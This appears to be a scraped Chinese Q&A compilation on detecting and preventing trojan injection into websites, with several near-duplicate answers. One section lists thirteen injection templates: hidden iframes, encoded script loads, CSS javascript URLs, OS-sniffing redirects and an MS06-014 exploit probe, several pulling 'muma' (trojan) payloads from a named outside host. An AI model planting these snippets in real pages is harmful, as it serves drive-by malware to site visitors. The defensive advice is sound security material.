㈠ 如何檢測訪問的網站是否被掛馬

第一種掛馬:查看網站的收錄是否正常。方式為:site:www.你的域名.com注意前面不要加http,看看是否有私版服,還有其權他的不合法的收錄,如果有,說明你的網站被掛馬了。
第二種掛馬:右鍵查看網頁代碼,如果有些連七八糟的鏈接,說明網站被掛了黑鏈。
第三種掛馬:打開某個導航或者網址發現跳轉到其他的網站或者網頁,說明你的網站被做了js跳轉,被掛馬了。
第四種掛馬:網站後台進不去,或者沒有執行許可權,說明你的後台被篡改了,可以用ftp看下相關文件,修改一下後台密碼。
第五種掛馬:網站打不開。很可能是ddos攻擊,或者首頁被卸掉。如果是ddos可以啟用防火牆如果首頁被卸掉可以用備份恢復一下。
總之,被掛馬的方式很多,要及早發現,及早補上漏洞,避免造成更大的損失。

㈡ 有沒有簡單辦法檢查自己網站是否被掛馬

最基本的就是 按修改時間來排列所有文件,如果時間被木馬修改了,就未必准了。

㈢ 如何進行網站被掛馬檢測

第一種掛馬:查看網站的收錄是否正常。方式為:site:www.你的域名.com注意前面不要加http,看看是否有私服,還有其他的不合法的收錄,如果有,說明你的網站被掛馬了。
第二種掛馬:右鍵查看網頁源代碼,如果有些連七八糟的鏈接,說明網站被掛了黑鏈。
第三種掛馬:打開某個導航或者網址發現跳轉到其他的網站或者網頁,說明你的網站被做了js跳轉,被掛馬了。
第四種掛馬:網站後台進不去,或者沒有執行許可權,說明你的後台被篡改了,可以用ftp看下相關文件,修改一下後台密碼。
第五種掛馬:網站打不開。很可能是ddos攻擊,或者首頁被卸掉。如果是ddos可以啟用防火牆如果首頁被卸掉可以用備份恢復一下。
總之,被掛馬的方式很多,要及早發現,及早補上漏洞,避免造成更大的損失。

㈣ 掛馬是什麼如何檢測網站安全,是否被掛馬

所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫「備份/恢復」或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。
第一種:查看網站的收錄是否正常。方式為:site:www.你的域名.com注意前面不要加http,看看是否有私服,還有其他的不合法的收錄,如果有,說明你的網站被掛馬了。

第二種:右鍵查看網頁源代碼,如果有些連七八糟的鏈接,說明網站被掛了黑鏈。

第三種:打開某個導航或者網址發現跳轉到其他的網站或者網頁,說明你的網站被做了js跳轉,被掛馬了。

第四種:網站後台進不去,或者沒有執行許可權,說明你的後台被篡改了,可以用ftp看下相關文件,修改一下後台密碼。

第五種:網站打不開。很可能是ddos攻擊,或者首頁被卸掉。如果是ddos可以啟用防火牆如果首頁被卸掉可以用備份恢復一下。

總之,被掛馬的方式很多,要及早發現,及早補上漏洞,避免造成更大的損失。

㈤ 怎麼檢測網站是否被掛馬了

個人網站如何檢測是否被掛馬

掛馬的表現:

  • 文件被修改

  • 被寫入版其它可執行的文件

  • 傳輸過程權被修改

  • 最好的前提是做好文件期限,ftp用戶和web程序分塊,文件期限控制要清晰

    針對第一個問題:
    可以建立白名單和文件的md5數據等清單,做定期對比
    對第二個問題:
    php,可以做好php執行的目錄控制,某些目錄如果是生成文件或者可以寫入文件的,則不允許php執行,直接把php的訪問rewrite掉
    第三個問題會比較復雜,如果有代理伺服器或者緩存伺服器,那可能會被修改,做好伺服器的安全工作

    綜上其實有一些常規的做法:

  • 伺服器安全工作要到位,比如ftp要用sftp,ftp用戶期限最小化

  • 文件期限要明確,不能讓執行php的用戶對你的重要文件有可寫的地方

  • 對生成的html文件可以的話,用另外的php進程用戶生成,避免文件被修改

  • 程序嚴防bug,第三方代碼經常如此,慎重

  • 控制php的可執行目錄,用rewrite方式對安全性有幫助

  • 對重要文件要定期檢查是否被修改,當然了,安全性考慮到位,不容易被修改的

  • 建議找專業的安全公司來解決,國內也就Sinesafe和綠盟等安全公司 比較專業.

㈥ 用什麼方法可以檢查出自己的網站有掛馬

檢測掛馬的方法有:
第一種檢測網站被掛馬的方法:使用專業的檢測工具,比如木馬專清道夫等。屬

第二種檢測網站被掛馬的方法:利用google搜索引擎檢測。在Google搜索框之間輸入你的網站進行檢測。如果網站有木馬,google會在搜索列表的下方提示該網站有不安全因素。

第三種檢測網站被掛馬的方法:使用殺毒軟體檢測,將自己網站的所有內容下載到本地磁碟,進行檢測。

第四種檢測網站被掛馬的方法:人工檢測,打開你的網站,查看源文件,根據網頁掛馬的種類也可以查看是否中了木馬。

第五種檢測網站被掛馬的方法:使用McAfee SiteAdvisor安全瀏覽網頁的插件。

第六種檢測網站被掛馬的方法:使用360掛馬監測中心、瑞星雲安全網站聯盟等提供的掛馬報警服務。通過在網站首頁添加監測代碼檢測。

㈦ 如何檢查自己網站是否掛馬

如果你的描述沒錯,你自個開辦了一個網站,否則下面的就不用看了。
要防止掛馬,主要是以下幾條:
一、禁止有人隨意進入與改動你的網站里的網頁源碼,做到防黑。
1、最主要是系統不要有漏洞。
2、關閉所有不應開放的埠。
3、定期查看埠進程情況。
4、保證源碼無問題。
5、定期查毒。
6、盡可能不在伺服器上運行任何不必要在伺服器上運行的軟體。
這樣就可以保證你的伺服器上不會有木馬等惡意軟體。
二、注意源碼漏洞。
某些別人做好的源碼可能會產生跨站聯接,這些聯接可以使來訪者經你的網站跨入到別人的網站中背地裡下載木馬。對此情況的防止主要是通過網站管理者的經驗及這些源碼的補丁及網上公布的一些方法去對付。
三、來訪者本身做好系統漏洞補丁也是一個非常有效的方法,此外,可以讓發現問題的朋友以留言等方法告知網站管理者,以及時發現此類現象,採用有效的方法去解決它。

㈧ 網頁掛馬的檢測方式

1.特徵匹配。將復網頁掛馬的腳制本按腳本病毒處理進行檢測。但是網頁腳本變形方式、加密方式比起傳統的PE格式病毒更為多樣,檢測起來也更加困難。
2.主動防禦。當瀏覽器要做出某些動作時,做出提示,例如:下載了某插件的安裝包,會提示是否運行。比如瀏覽器創建一個暴風影音播放器時,提示是否允許運行。在多數情況下用戶都會點擊是,網頁木馬會因此得到執行。
3.檢查父進程是否為瀏覽器。這種方法可以很容易的被躲過且會對很多插件造成誤報。

㈨ 如何進行網站掛馬檢測與清除

掛馬是常見的對網站和客戶都影響巨大的危害之一。如果是在訪問出來的源文件的頭上,或是最後有被加代碼,這個一般是網站文件被要改了,或是ARP,如果是源文件的很多數據位置(中間),那一般是資料庫被人掛了。伺服器上首先要安裝防病毒軟體,而且要保持在線病毒庫的更新,本人推薦使用eset nod32殺毒軟體,效果不錯,監測查殺木馬很及時,一般如果伺服器上的網頁里被掛馬了,一般都會檢測出來。
不完全統計,90%的網站都被掛過馬,掛馬是指在獲取網站或者網站伺服器的部分或者全部許可權後,在網頁文件中插入一段惡意代碼,這些惡意代碼主要是一些包括IE等漏洞利用代碼,用戶訪問被掛馬的頁面時,如果系統沒有更新惡意代碼中利用的漏洞補丁,則會執行惡意代碼程序,進行盜號等危險超過。目前掛馬主要是為了商業利益,有的掛馬是為了賺取流量,有的是為了盜取游戲等賬號,也有的是為了好玩,不管是處於那種目的,對於訪問被掛馬的網站來說都是一種潛在的威脅,影響運營網站公司形象。
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.softxp.net/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.softxp.net/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script
src=http://www.softxp.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調用:
<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.softbar.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_softbar_com();
return true;"> 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判斷系統代碼
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判斷是否有ms06014代碼
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能讀取js的代碼demo
//讀娶src的對象
var v = document.getElementById("advjs");
//讀娶src的參數
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.softxp.net/1/"+u_num+".htm\" width=\"0\" height=\"0\"
frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的參數函數
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

㈩ 個人網站如何檢測是否被掛馬

個人網站如何檢測是否被掛馬

掛馬的表現:

  • 文件被修改

  • 被寫入其它可執行的文件

  • 傳輸過程被修改

  • 最好的前提是做好文件期限,ftp用戶和web程序分塊,文件期限控制要清晰

    針對第一個問題:
    可以建立白名單和文件的md5數據等清單,做定期對比
    對第二個問題:
    如php,可以做好php執行的目錄控制,某些目錄如果是生成文件或者可以寫入文件的,則不允許php執行,直接把php的訪問rewrite掉
    第三個問題會比較復雜,如果有代理伺服器或者緩存伺服器,那可能會被修改,做好伺服器的安全工作

    綜上其實有一些常規的做法:

  • 伺服器安全工作要到位,比如ftp要用sftp,ftp用戶期限最小化

  • 文件期限要明確,不能讓執行php的用戶對你的重要文件有可寫的地方

  • 對生成的html文件可以的話,用另外的php進程用戶生成,避免文件被修改

  • 程序嚴防bug,第三方代碼經常如此,慎重

  • 控制php的可執行目錄,用rewrite方式對安全性有幫助

  • 對重要文件要定期檢查是否被修改,當然了,安全性考慮到位,不容易被修改的

  • 建議找專業的安全公司來解決,國內也就Sinesafe和綠盟等安全公司 比較專業.